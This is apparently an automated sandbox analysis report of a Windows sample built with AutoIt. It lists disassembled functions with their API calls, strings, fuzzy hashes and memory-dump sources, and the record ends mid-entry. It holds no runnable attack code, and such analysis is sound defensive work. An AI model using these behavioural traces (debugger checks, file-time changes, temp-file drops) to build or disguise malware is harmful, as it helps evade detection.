Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction ID: 4cf5a98929430355723f988d07ba03a4d62a4431bfff45468aacc6f2b9d4b822
Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction Fuzzy Hash: A962F830A142589BEB24CBA4CC51BDEB772FF58700F1091A9D20DEB394E7769E81CB59

Function 0066955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00604EE5: _fseek.LIBCMT ref: 00604EFD

Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669824
Part of subcall function 00669734: _wcscmp.LIBCMT ref: 00669837

_free.LIBCMT ref: 006696A2
_free.LIBCMT ref: 006696A9
_free.LIBCMT ref: 00669714

Part of subcall function 00622D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00629A24), ref: 00622D69
Part of subcall function 00622D55: GetLastError.KERNEL32(00000000,?,00629A24), ref: 00622D7B

_free.LIBCMT ref: 0066971C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 9c8a8a5793b2c873df15f5470ce758d045e2b7bab4cf353a94eb8d2e8630e97b
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: EE516FB1D04259AFDF649F64DC81A9EBBBAEF48300F10449EF609A3341DB715A91CF58

Function 0062470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006247A0
__flush.LIBCMT ref: 006247C0
__write.LIBCMT ref: 006247F3
__flsbuf.LIBCMT ref: 00624821

Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: e8d4f06cbccef55077fb08a736d170dae4a7cc2a4e6b951f61eeb5f3b6784244
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 9B41C234A00F669BDB18CF69E8809EA7BA7AF45360B24817DE82587740DF74DD418F40

Function 006044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006044CF

Part of subcall function 0060407C: _memset.LIBCMT ref: 006040FC
Part of subcall function 0060407C: _wcscpy.LIBCMT ref: 00604150
Part of subcall function 0060407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00604160

KillTimer.USER32(?,00000001,?,?), ref: 00604524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00604533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0063D4B9

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f33790376940728bc86506f4ae630f30669bc03d603ac89a67628e9762ed6384
Instruction ID: 400f452105b21ce3d7441b2c2326801afcd43aa2e7df01c038bb55536a2b0873
Opcode Fuzzy Hash: f33790376940728bc86506f4ae630f30669bc03d603ac89a67628e9762ed6384
Instruction Fuzzy Hash: FA210AB0944784AFE7338B249C55BE7BBEE9F01304F04049EE79E57282C7742A84CB41

Function 00604C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00604CBA

Strings

AU3!P/i, xrefs: 00604CB4
EA06, xrefs: 0063D8CC

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/i$EA06
API String ID: 4104443479-1974690362
Opcode ID: 6f05ad5e0493deb274746dbd111d90380be46084ac07ecbb27420be53b27dfd9
Instruction ID: 47b18d2f2bf4b15040617365fef09d43e546bfa5f363dc9a06b8284196a04db9
Opcode Fuzzy Hash: 6f05ad5e0493deb274746dbd111d90380be46084ac07ecbb27420be53b27dfd9
Instruction Fuzzy Hash: 29419BA1A8015867DF399B54C8A17FF7FA3DF41300F284468EE829B3C2DE309D4187A1

Function 00607285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0063EA39
GetOpenFileNameW.COMDLG32(?), ref: 0063EA83

Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770

Part of subcall function 00620791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006207B0

Strings

X, xrefs: 0063EA51

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: f6bb38033efee6ad26c6c8ddc6227ee96a27afbd0c478a387472cde14429e453
Instruction ID: 43630469564b26793cabacee9bdebec0736dc039ce453196d5ca930832ea5c83
Opcode Fuzzy Hash: f6bb38033efee6ad26c6c8ddc6227ee96a27afbd0c478a387472cde14429e453
Instruction Fuzzy Hash: 3721A171A00258ABCB45DF94D845BEE7BFAAF49310F00401AE408AB281DBB45A89CFA5

Function 00668D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00668DAC
__fread_nolock.LIBCMT ref: 00668DC1

Strings

EA06, xrefs: 00668DF3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: ab5a9dae190de4b39815a46e71a7bb799271da3c876ad52fd735476e9f25aa4d
Instruction ID: d15ef9a7260a09b3bae30256b5cce4399fd574662f818cc916b711460b5360b8
Opcode Fuzzy Hash: ab5a9dae190de4b39815a46e71a7bb799271da3c876ad52fd735476e9f25aa4d
Instruction Fuzzy Hash: 6A01F9718046287EDB68CBA8D816EFE7BFCDF11301F00419EF552D3181E874E6048B60

Function 006698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006698F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0066990F

Strings

aut, xrefs: 00669909

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: ea11fd9c3719bcd356aefa710a171489ff1c3c99bf87e3bd992b8b4ce259fc21
Instruction ID: 7ce29286dea9bdc077a424b124ea3421ff4d01369b1ea275533bcec1e147a0f0
Opcode Fuzzy Hash: ea11fd9c3719bcd356aefa710a171489ff1c3c99bf87e3bd992b8b4ce259fc21
Instruction Fuzzy Hash: F8D05E7954030DBBDB609BE0DC0EFDA773DE704700F0003B1BA54D20A1EAB096988B91

Function 0067CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ed285417a0cdbfd11ac74974dc9cf313cadad0360da983f5272b8c37c2a58d
Instruction ID: f0509574e798ad344c7e7cae87b481d79289d5c2380afa09f0d18a24c595225d
Opcode Fuzzy Hash: e5ed285417a0cdbfd11ac74974dc9cf313cadad0360da983f5272b8c37c2a58d
Instruction Fuzzy Hash: 09F13B716083419FCB54DF28C480A6ABBE6FF88324F54892EF8999B351D734E945CF92

Function 0060434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00604370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00604415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00604432

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 75af74b97234dec7f24bc28ad507773e2439f1047b5c8b1e7ec5f336886e41fd
Instruction ID: b00ceb686a7df36dd1932e0e86a013b6fce3d72b7a4ccb4ed57752b901bc9900
Opcode Fuzzy Hash: 75af74b97234dec7f24bc28ad507773e2439f1047b5c8b1e7ec5f336886e41fd
Instruction Fuzzy Hash: 753181B05057019FD734DF24D884AABBBF9FB58308F00092EE69AC2391DB74A944CB92

Function 0062571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00625733

Part of subcall function 0062A16B: __NMSG_WRITE.LIBCMT ref: 0062A192
Part of subcall function 0062A16B: __NMSG_WRITE.LIBCMT ref: 0062A19C

__NMSG_WRITE.LIBCMT ref: 0062573A

Part of subcall function 0062A1C8: GetModuleFileNameW.KERNEL32(00000000,006C33BA,00000104,?,00000001,00000000), ref: 0062A25A
Part of subcall function 0062A1C8: ___crtMessageBoxW.LIBCMT ref: 0062A308

Part of subcall function 0062309F: ___crtCorExitProcess.LIBCMT ref: 006230A5
Part of subcall function 0062309F: ExitProcess.KERNEL32 ref: 006230AE

Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28

RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,00620DD3,?), ref: 0062575F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 8df9d8460d53950250b97de09a54bd1d63d78f227d9e2e3cb94fe026f14c94d1
Instruction ID: 4efd93095ff50f377deb52a853712fea890f133fbded7732e108f53f459da191
Opcode Fuzzy Hash: 8df9d8460d53950250b97de09a54bd1d63d78f227d9e2e3cb94fe026f14c94d1
Instruction Fuzzy Hash: D201D231280F31DEDA602774FC46A6A634B8B42762F10052DF4069B381DFB489014E66

Function 006698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00669548,?,?,?,?,?,00000004), ref: 006698BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00669548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006698D1
CloseHandle.KERNEL32(00000000,?,00669548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006698D8

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 43cded33f89aed0062d0726dbb03583677db450a21350ac39fb13768053b8718
Instruction ID: 76f2e33c35a205b03de8308a8da307d26c994fa82a04c0de3809184b0ade2ddf
Opcode Fuzzy Hash: 43cded33f89aed0062d0726dbb03583677db450a21350ac39fb13768053b8718
Instruction Fuzzy Hash: 5FE08632140214B7D7212B54EC0DFDA7B1AEB06760F104220FB54A91E087B1152197D8

Function 00668D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00668D1B

Part of subcall function 00622D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00629A24), ref: 00622D69
Part of subcall function 00622D55: GetLastError.KERNEL32(00000000,?,00629A24), ref: 00622D7B

_free.LIBCMT ref: 00668D2C
_free.LIBCMT ref: 00668D3E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 55979ae11ea4b1904e2e5d704245e3fd4fca128c1ff782ed924aeb25618f100c
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: F7E012B1601A125BCB64A678B950AD313DE8F9C3527140E1DF50DD7286CE64FC528578

Function 0060A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0063FC01

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: df1966ff927690a8e43ff1e3236997cd78fb5a76714a836b1625987f62f07df7
Instruction ID: ef020f3b19de82306b9e48254fd504e49486df18e6aeb6bd54b48fdad23feed9
Opcode Fuzzy Hash: df1966ff927690a8e43ff1e3236997cd78fb5a76714a836b1625987f62f07df7
Instruction Fuzzy Hash: 40225770648301DFDB28DF54C494A6BB7E2BF84344F15896DE88A8B3A2D731EC45CB86

Function 00607A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00607AAB
_memmove.LIBCMT ref: 00607B16

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction ID: a74a1109f3ec8b71dcced8f8f6680f09dbd9f4631e4b4314b326784b87d453b1
Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction Fuzzy Hash: 7C3184B1B44506AFC708DF68D891E6AB3A6FF483107158629E519CB3D1EB30F951CB90

Function 006047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00604834

Part of subcall function 0062336C: __lock.LIBCMT ref: 00623372
Part of subcall function 0062336C: DecodePointer.KERNEL32(00000001,?,00604849,00657C74), ref: 0062337E
Part of subcall function 0062336C: EncodePointer.KERNEL32(?,?,00604849,00657C74), ref: 00623389

Part of subcall function 006048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00604915
Part of subcall function 006048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0060492A

Part of subcall function 00603B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B68
Part of subcall function 00603B3A: IsDebuggerPresent.KERNEL32 ref: 00603B7A
Part of subcall function 00603B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006C52F8,006C52E0,?,?), ref: 00603BEB
Part of subcall function 00603B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00603C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00604874

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 320a65458169786f7ea101c48b63fc78c60f9b8203479a4aee8c671ef94c6290
Instruction ID: 112919fa3e3d403243adc91b8b30dfde8313fd6957d1a3bceda3bae24b03cc1b
Opcode Fuzzy Hash: 320a65458169786f7ea101c48b63fc78c60f9b8203479a4aee8c671ef94c6290
Instruction Fuzzy Hash: F9119DB19087519FC714EF28EC0591ABBEAEF94750F108A1EF441832B1DB749A49CB9A

Function 00620DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0062571C: __FF_MSGBANNER.LIBCMT ref: 00625733
Part of subcall function 0062571C: __NMSG_WRITE.LIBCMT ref: 0062573A
Part of subcall function 0062571C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,00620DD3,?), ref: 0062575F

std::exception::exception.LIBCMT ref: 00620DEC
__CxxThrowException@8.LIBCMT ref: 00620E01

Part of subcall function 0062859B: RaiseException.KERNEL32(?,?,?,006B9E78,00000000,?,?,?,?,00620E06,?,006B9E78,?,00000001), ref: 006285F0

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 50bd50cacb44c20e58d3681b4f934c7ed68be72ab6ae074ce29d201efb9900eb
Instruction ID: e882cc557687aa2baa730f3bf8150f9fba41233d57acbfbea734c1f3ac2301f6
Opcode Fuzzy Hash: 50bd50cacb44c20e58d3681b4f934c7ed68be72ab6ae074ce29d201efb9900eb
Instruction Fuzzy Hash: 76F0F935402A3A7ADB10BA94FC215DE7BAE9F00310F004819F90497682DF709A94CAD5

Function 006255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062562C
__lock_file.LIBCMT ref: 0062564D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: e83fac7f73f177b028bbb88d159835751d44c0d7f1e7883adda404861c3abb56
Instruction ID: 75f55a0502fdb6c8d50c20004bfb2871ad740f6c8ab300293e999d4fbb807f13
Opcode Fuzzy Hash: e83fac7f73f177b028bbb88d159835751d44c0d7f1e7883adda404861c3abb56
Instruction Fuzzy Hash: FC01D471801E28AFCF72AF68BC028DE7B63AF91361F404119F8241B2A1DB318A51DF95

Function 006253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28

__lock_file.LIBCMT ref: 006253EB

Part of subcall function 00626C11: __lock.LIBCMT ref: 00626C34

__fclose_nolock.LIBCMT ref: 006253F6

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

